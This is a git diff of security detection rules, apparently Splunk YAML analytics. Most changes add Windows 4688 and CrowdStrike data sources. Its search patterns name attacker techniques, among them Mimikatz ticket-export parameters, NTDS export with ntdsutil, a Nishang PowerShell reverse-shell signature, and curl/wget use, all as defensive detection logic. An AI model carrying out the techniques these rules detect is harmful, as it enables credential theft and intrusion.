diff --git a/detections/endpoint/local_account_discovery_with_net.yml b/detections/endpoint/local_account_discovery_with_net.yml
index 11f6fcf8f6..8af1029345 100644
--- a/detections/endpoint/local_account_discovery_with_net.yml
+++ b/detections/endpoint/local_account_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `net.exe` or `net1.
   lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_net` (Processes.process=*user
   OR Processes.process=*users) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/local_account_discovery_with_wmic.yml b/detections/endpoint/local_account_discovery_with_wmic.yml
index b00c30fc36..dc3b012ed7 100644
--- a/detections/endpoint/local_account_discovery_with_wmic.yml
+++ b/detections/endpoint/local_account_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `wmic.exe` with com
   escalation, or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process=*useraccount*)
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/macos___re_opened_applications.yml b/detections/endpoint/macos___re_opened_applications.yml
index 9f91115aab..0a7e2b4bec 100644
--- a/detections/endpoint/macos___re_opened_applications.yml
+++ b/detections/endpoint/macos___re_opened_applications.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies processes referencing plist files
   allow an attacker to execute code or maintain persistence on the affected system,
   potentially leading to further compromise.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*com.apple.loginwindow*"
diff --git a/detections/endpoint/macos_lolbin.yml b/detections/endpoint/macos_lolbin.yml
index 4ba5210d12..eb2f4574d6 100644
--- a/detections/endpoint/macos_lolbin.yml
+++ b/detections/endpoint/macos_lolbin.yml
@@ -14,7 +14,7 @@ description: The following analytic detects multiple executions of Living off th
   arbitrary code, escalate privileges, or persist within the environment, posing a
   significant security risk.
 data_source: []
-search: '`osquery` name=es_process_events columns.cmdline IN ("find*", "crontab*",
+search: '`osquery_macro` name=es_process_events columns.cmdline IN ("find*", "crontab*",
   "screencapture*", "openssl*", "curl*", "wget*", "killall*", "funzip*") | rename
   columns.* as * | stats  min(_time) as firstTime max(_time) as lastTime values(cmdline)
   as cmdline, values(pid) as pid, values(parent) as parent, values(path) as path,
diff --git a/detections/endpoint/macos_plutil.yml b/detections/endpoint/macos_plutil.yml
index f35e0216ee..5052388030 100644
--- a/detections/endpoint/macos_plutil.yml
+++ b/detections/endpoint/macos_plutil.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the usage of the `plutil` command to
   security.
 data_source:
 - osquery
-search: '`osquery` name=es_process_events columns.path=/usr/bin/plutil | rename columns.*
+search: '`osquery_macro` name=es_process_events columns.path=/usr/bin/plutil | rename columns.*
   as * | stats count  min(_time) as firstTime max(_time) as lastTime by username host
   cmdline pid path parent signing_id | rename username as user, cmdline as process,
   path as process_path, host as dest | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/endpoint/malicious_inprocserver32_modification.yml b/detections/endpoint/malicious_inprocserver32_modification.yml
index 602e7ee42d..4ebe25fee1 100644
--- a/detections/endpoint/malicious_inprocserver32_modification.yml
+++ b/detections/endpoint/malicious_inprocserver32_modification.yml
@@ -13,9 +13,8 @@ description: The following analytic detects a process modifying the registry wit
   malicious, this could allow an attacker to persist in the environment, execute arbitrary
   code, or escalate privileges, posing a severe threat to system integrity and security.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid
   Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats
diff --git a/detections/endpoint/malicious_powershell_process___encoded_command.yml b/detections/endpoint/malicious_powershell_process___encoded_command.yml
index 92ea9118aa..e4970cf1e8 100644
--- a/detections/endpoint/malicious_powershell_process___encoded_command.yml
+++ b/detections/endpoint/malicious_powershell_process___encoded_command.yml
@@ -16,6 +16,8 @@ description: 'The following analytic detects the use of the EncodedCommand param
   tune based on known administrative scripts.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` by Processes.user
   Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml b/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml
index 6e76769dfa..07111d4bc2 100644
--- a/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml
+++ b/detections/endpoint/malicious_powershell_process___execution_policy_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects PowerShell processes initiated with
   access within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process_id) as
   process_id, values(Processes.parent_process_id) as parent_process_id values(Processes.process)
   as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml b/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml
index ec80c4320d..38e345f8f3 100644
--- a/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml
+++ b/detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml
@@ -14,7 +14,7 @@ description: The following analytic detects PowerShell processes launched with c
   privilege escalation, or persistent access within the environment, posing a significant
   security risk.
 data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
 search: "| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell`
diff --git a/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml b/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml
index b2a5e25b11..2b34a30818 100644
--- a/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml
+++ b/detections/endpoint/mimikatz_passtheticket_commandline_parameters.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Mimikatz command line par
   within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process = "*sekurlsa::tickets
   /export*" OR Processes.process = "*kerberos::ptt*") by Processes.dest Processes.user
diff --git a/detections/endpoint/mmc_lolbas_execution_process_spawn.yml b/detections/endpoint/mmc_lolbas_execution_process_spawn.yml
index 300a40f2d2..b07f02f030 100644
--- a/detections/endpoint/mmc_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/mmc_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies `mmc.exe` spawning a LOLBAS execu
   and persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=mmc.exe)
   (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/modify_acl_permission_to_files_or_folder.yml b/detections/endpoint/modify_acl_permission_to_files_or_folder.yml
index 3e43502335..98c03804bc 100644
--- a/detections/endpoint/modify_acl_permission_to_files_or_folder.yml
+++ b/detections/endpoint/modify_acl_permission_to_files_or_folder.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the modification of ACL permissions
   potentially leading to data breaches or further system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "cacls.exe"
diff --git a/detections/endpoint/monitor_registry_keys_for_print_monitors.yml b/detections/endpoint/monitor_registry_keys_for_print_monitors.yml
index ad8a2096e8..ea1a640407 100644
--- a/detections/endpoint/monitor_registry_keys_for_print_monitors.yml
+++ b/detections/endpoint/monitor_registry_keys_for_print_monitors.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications to the registry key `H
   this could allow attackers to maintain persistence, execute code with high privileges,
   and potentially compromise the entire system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.action=modified AND Registry.registry_path="*CurrentControlSet\\Control\\Print\\Monitors*")
diff --git a/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml b/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml
index 288feba20e..41c700af5e 100644
--- a/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml
+++ b/detections/endpoint/ms_exchange_mailbox_replication_service_writing_active_server_pages.yml
@@ -14,8 +14,7 @@ description: 'The following analytic identifies the creation of suspicious .aspx
   maintain persistence within the environment. Immediate investigation and remediation
   are crucial to prevent further compromise.'
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name=MSExchangeMailboxReplication.exe  by _time span=1h
   Processes.process_id Processes.process_name Processes.process_guid Processes.dest
diff --git a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml b/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
index 8d752de08a..46d80c1e16 100644
--- a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
+++ b/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the suspicious spawning of MSBuild.e
   activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process_name)
   as process_name values(Processes.process) as process min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
diff --git a/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml b/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml
index c4779b8195..ba8a54b183 100644
--- a/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml
+++ b/detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml
@@ -14,6 +14,8 @@ description: The following analytic detects a suspicious mshta.exe process spawn
   or download additional malware, posing a severe threat to the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   = "mshta.exe"  `process_rundll32` OR `process_regsvr32` by  Processes.parent_process_name
diff --git a/detections/endpoint/msmpeng_application_dll_side_loading.yml b/detections/endpoint/msmpeng_application_dll_side_loading.yml
index 54cfc12b83..7418bfde83 100644
--- a/detections/endpoint/msmpeng_application_dll_side_loading.yml
+++ b/detections/endpoint/msmpeng_application_dll_side_loading.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the suspicious creation of msmpeng.e
   system compromise, and potential data loss or extortion.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '|tstats `security_content_summariesonly` values(Filesystem.file_path) as
   file_path count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem
   where (Filesystem.file_name = "msmpeng.exe" OR Filesystem.file_name = "mpsvc.dll")  AND
diff --git a/detections/endpoint/net_localgroup_discovery.yml b/detections/endpoint/net_localgroup_discovery.yml
index f8360cafad..bd88ee31cc 100644
--- a/detections/endpoint/net_localgroup_discovery.yml
+++ b/detections/endpoint/net_localgroup_discovery.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the `net localgroup
   could lead to further privilege escalation or lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=net.exe
   OR Processes.process_name=net1.exe (Processes.process="*localgroup*") by Processes.dest
diff --git a/detections/endpoint/net_profiler_uac_bypass.yml b/detections/endpoint/net_profiler_uac_bypass.yml
index ea5b0dbdc2..4efe979c66 100644
--- a/detections/endpoint/net_profiler_uac_bypass.yml
+++ b/detections/endpoint/net_profiler_uac_bypass.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry aimed
   If confirmed malicious, this could allow an attacker to execute arbitrary code with
   elevated privileges, compromising system integrity.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Registry where Registry.registry_path= "*\\Environment\\COR_PROFILER_PATH"
diff --git a/detections/endpoint/network_connection_discovery_with_arp.yml b/detections/endpoint/network_connection_discovery_with_arp.yml
index 39740f41b3..ab79da0570 100644
--- a/detections/endpoint/network_connection_discovery_with_arp.yml
+++ b/detections/endpoint/network_connection_discovery_with_arp.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `arp.exe` with the
   lateral movement or attacks.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="arp.exe")
   (Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/network_connection_discovery_with_net.yml b/detections/endpoint/network_connection_discovery_with_net.yml
index 22ce817b64..35b00a4faa 100644
--- a/detections/endpoint/network_connection_discovery_with_net.yml
+++ b/detections/endpoint/network_connection_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `net.exe` or `ne
   attacks, potentially leading to data exfiltration or lateral movement.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
   OR Processes.process_name="net1.exe") (Processes.process=*use*) by Processes.dest
diff --git a/detections/endpoint/network_connection_discovery_with_netstat.yml b/detections/endpoint/network_connection_discovery_with_netstat.yml
index 450173c2df..fe95b08f33 100644
--- a/detections/endpoint/network_connection_discovery_with_netstat.yml
+++ b/detections/endpoint/network_connection_discovery_with_netstat.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `netstat.exe` with
   critical systems, and plan further lateral movement or data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="netstat.exe")
   (Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/network_discovery_using_route_windows_app.yml b/detections/endpoint/network_discovery_using_route_windows_app.yml
index 8663d4e1c5..f5b53520ce 100644
--- a/detections/endpoint/network_discovery_using_route_windows_app.yml
+++ b/detections/endpoint/network_discovery_using_route_windows_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the `route.exe` Win
   administrative tasks or automated scripts.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_route` by Processes.dest
   Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/nishang_powershelltcponeline.yml b/detections/endpoint/nishang_powershelltcponeline.yml
index 0bfd311939..6959615fe3 100644
--- a/detections/endpoint/nishang_powershelltcponeline.yml
+++ b/detections/endpoint/nishang_powershelltcponeline.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of the Nishang Invoke-PowerS
   remote access, data theft, or further compromise of the affected system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process=*Net.Sockets.TCPClient*
   AND Processes.process=*System.Text.ASCIIEncoding*) by Processes.dest Processes.user
diff --git a/detections/endpoint/nltest_domain_trust_discovery.yml b/detections/endpoint/nltest_domain_trust_discovery.yml
index ac75839a79..f7fe8fdc4b 100644
--- a/detections/endpoint/nltest_domain_trust_discovery.yml
+++ b/detections/endpoint/nltest_domain_trust_discovery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `nltest.exe` wit
   further compromise and pivoting within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_nltest` (Processes.process=*/domain_trusts*
   OR Processes.process=*/all_trusts*) by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/notepad_with_no_command_line_arguments.yml b/detections/endpoint/notepad_with_no_command_line_arguments.yml
index 419918270a..25f31f4117 100644
--- a/detections/endpoint/notepad_with_no_command_line_arguments.yml
+++ b/detections/endpoint/notepad_with_no_command_line_arguments.yml
@@ -7,6 +7,8 @@ type: TTP
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies instances where Notepad.exe is launched
   without any command line arguments, a behavior commonly associated with the SliverC2
   framework. This detection leverages process creation events from Endpoint Detection
diff --git a/detections/endpoint/ntdsutil_export_ntds.yml b/detections/endpoint/ntdsutil_export_ntds.yml
index 34a70d201c..19227bf537 100644
--- a/detections/endpoint/ntdsutil_export_ntds.yml
+++ b/detections/endpoint/ntdsutil_export_ntds.yml
@@ -14,6 +14,8 @@ description: 'The following analytic detects the use of Ntdsutil to export the A
   and privilege escalation within the network.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=ntdsutil.exe
   Processes.process=*ntds* Processes.process=*create*) by Processes.dest Processes.user
diff --git a/detections/endpoint/office_application_drop_executable.yml b/detections/endpoint/office_application_drop_executable.yml
index 4991080650..3d99783b40 100644
--- a/detections/endpoint/office_application_drop_executable.yml
+++ b/detections/endpoint/office_application_drop_executable.yml
@@ -14,8 +14,7 @@ description: The following analytic detects Microsoft Office applications droppi
   this activity could lead to code execution, privilege escalation, or persistent
   access, posing a severe threat to the environment.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
   by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest
diff --git a/detections/endpoint/office_application_spawn_regsvr32_process.yml b/detections/endpoint/office_application_spawn_regsvr32_process.yml
index bbf6fa1519..7c7186e554 100644
--- a/detections/endpoint/office_application_spawn_regsvr32_process.yml
+++ b/detections/endpoint/office_application_spawn_regsvr32_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where an Office applica
   potentially escalate privileges.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
   = "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name
diff --git a/detections/endpoint/office_application_spawn_rundll32_process.yml b/detections/endpoint/office_application_spawn_rundll32_process.yml
index 8c30efb8d2..d233706b21 100644
--- a/detections/endpoint/office_application_spawn_rundll32_process.yml
+++ b/detections/endpoint/office_application_spawn_rundll32_process.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where an Office applica
   lead to code execution, further system compromise, and potential data exfiltration.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
   = "winword.exe" OR Processes.parent_process_name = "excel.exe" OR Processes.parent_process_name
diff --git a/detections/endpoint/office_document_spawned_child_process_to_download.yml b/detections/endpoint/office_document_spawned_child_process_to_download.yml
index f359bb1535..01534f5b1a 100644
--- a/detections/endpoint/office_document_spawned_child_process_to_download.yml
+++ b/detections/endpoint/office_document_spawned_child_process_to_download.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies Office applications spawning chil
   or further malware deployment, posing a severe threat to the organization's security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe",
diff --git a/detections/endpoint/office_product_spawn_cmd_process.yml b/detections/endpoint/office_product_spawn_cmd_process.yml
index eefddc7ecd..fe08d92687 100644
--- a/detections/endpoint/office_product_spawn_cmd_process.yml
+++ b/detections/endpoint/office_product_spawn_cmd_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects an Office product spawning a CMD pro
   activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
   = "winword.exe" OR Processes.parent_process_name= "excel.exe" OR Processes.parent_process_name
diff --git a/detections/endpoint/office_product_spawning_bitsadmin.yml b/detections/endpoint/office_product_spawning_bitsadmin.yml
index ec0b2821fe..b3e2d4d3ad 100644
--- a/detections/endpoint/office_product_spawning_bitsadmin.yml
+++ b/detections/endpoint/office_product_spawning_bitsadmin.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
   compromise of the affected system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe",
diff --git a/detections/endpoint/office_product_spawning_certutil.yml b/detections/endpoint/office_product_spawning_certutil.yml
index 4f69c47264..16a928f462 100644
--- a/detections/endpoint/office_product_spawning_certutil.yml
+++ b/detections/endpoint/office_product_spawning_certutil.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
   to prevent potential damage.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe",
diff --git a/detections/endpoint/office_product_spawning_mshta.yml b/detections/endpoint/office_product_spawning_mshta.yml
index 77be35a956..8c0cf83a9b 100644
--- a/detections/endpoint/office_product_spawning_mshta.yml
+++ b/detections/endpoint/office_product_spawning_mshta.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where a Microsoft Offic
   further malware deployment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe", "onenote.exe","onenotem.exe",
diff --git a/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml b/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml
index b0350eb750..c2bf3c1353 100644
--- a/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml
+++ b/detections/endpoint/office_product_spawning_rundll32_with_no_dll.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
   are recommended.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe",
diff --git a/detections/endpoint/office_product_spawning_windows_script_host.yml b/detections/endpoint/office_product_spawning_windows_script_host.yml
index b85621a116..0ac2621443 100644
--- a/detections/endpoint/office_product_spawning_windows_script_host.yml
+++ b/detections/endpoint/office_product_spawning_windows_script_host.yml
@@ -14,6 +14,8 @@ description: The following analytic detects an Office product spawning WScript.e
   code execution, data exfiltration, or further system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe",
diff --git a/detections/endpoint/office_product_spawning_wmic.yml b/detections/endpoint/office_product_spawning_wmic.yml
index e6be1c2d40..a2fdc495a4 100644
--- a/detections/endpoint/office_product_spawning_wmic.yml
+++ b/detections/endpoint/office_product_spawning_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects any Windows Office Product spawning
   lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe",
diff --git a/detections/endpoint/office_product_writing_cab_or_inf.yml b/detections/endpoint/office_product_writing_cab_or_inf.yml
index b72c3790b4..ca2b9bca25 100644
--- a/detections/endpoint/office_product_writing_cab_or_inf.yml
+++ b/detections/endpoint/office_product_writing_cab_or_inf.yml
@@ -14,6 +14,8 @@ description: The following analytic detects Office products writing .cab or .inf
   control over the affected system and potentially compromise sensitive data.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 - Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where Processes.process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
diff --git a/detections/endpoint/office_spawning_control.yml b/detections/endpoint/office_spawning_control.yml
index 0ea96e2f34..4c426962fa 100644
--- a/detections/endpoint/office_spawning_control.yml
+++ b/detections/endpoint/office_spawning_control.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where `control.exe` is
   the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
diff --git a/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml b/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml
index 40b85044fc..0e8f8fe2c2 100644
--- a/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml
+++ b/detections/endpoint/outbound_network_connection_from_java_using_default_ports.yml
@@ -13,7 +13,7 @@ description: The following analytic detects outbound network connections from Ja
